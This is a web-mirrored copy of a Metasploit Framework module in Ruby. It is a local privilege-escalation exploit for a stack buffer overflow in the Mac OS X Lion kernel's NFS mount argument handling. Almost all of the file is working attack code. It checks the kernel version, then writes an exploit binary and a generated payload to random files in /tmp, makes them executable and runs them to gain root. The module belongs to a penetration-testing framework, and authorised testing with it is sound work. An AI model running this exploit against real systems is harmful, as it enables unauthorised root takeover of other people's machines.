Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/nfs_mount_root.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit',

19
        'Description' => %q{

20
          This exploit leverages a stack buffer overflow vulnerability to escalate privileges.

21
          The vulnerable function nfs_convert_old_nfs_args does not verify the size

22
          of a user-provided argument before copying it to the stack. As a result, by

23
          passing a large size as an argument, a local user can overwrite the stack with arbitrary

24
          content.

25


26
          Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Kenzley Alphonse', # discovery and a very well-written exploit

31
          'joev' # msf module

32
        ],

33
        'References' => [

34
          [ 'EDB', '32813' ]

35
        ],

36
        'Platform' => 'osx',

37
        'Arch' => [ ARCH_X64 ],

38
        'SessionTypes' => [ 'shell', 'meterpreter' ],

39
        'Targets' => [

40
          [

41
            'Mac OS X 10.7 Lion x64 (Native Payload)',

42
            {

43
              'Platform' => 'osx',

44
              'Arch' => ARCH_X64

45
            }

46
          ]

47
        ],

48
        'DefaultTarget' => 0,

49
        'DisclosureDate' => '2014-04-11',

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57
  end

58


59
  def check

60
    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"

61
      CheckCode::Appears

62
    else

63
      CheckCode::Safe

64
    end

65
  end

66


67
  def exploit

68
    if is_root?

69
      fail_with Failure::BadConfig, 'Session already has root privileges'

70
    end

71


72
    if check != CheckCode::Appears

73
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

74
    end

75


76
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')

77
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')

78
    exploit = File.read(file)

79
    pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

80
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

81
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

82


83
    print_status "Writing temp file as '#{tmpfile}'"

84
    write_file(tmpfile, exploit)

85
    register_file_for_cleanup(tmpfile)

86


87
    print_status "Writing payload file as '#{payloadfile}'"

88
    write_file(payloadfile, pload)

89
    register_file_for_cleanup(payloadfile)

90


91
    print_status "Executing payload..."

92
    cmd_exec("chmod +x #{tmpfile}")

93
    cmd_exec("chmod +x #{payloadfile}")

94
    cmd_exec("#{tmpfile} #{payloadfile}")

95
  end

96


97
  def xnu_ver

98
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)

99
    m && m[1]

100
  end

101


102
  def ver_lt(a, b)

103
    Rex::Version.new(a.gsub(/~.*?$/, '')) < Rex::Version.new(b.gsub(/~.*?$/, ''))

104
  end

105
end

106


107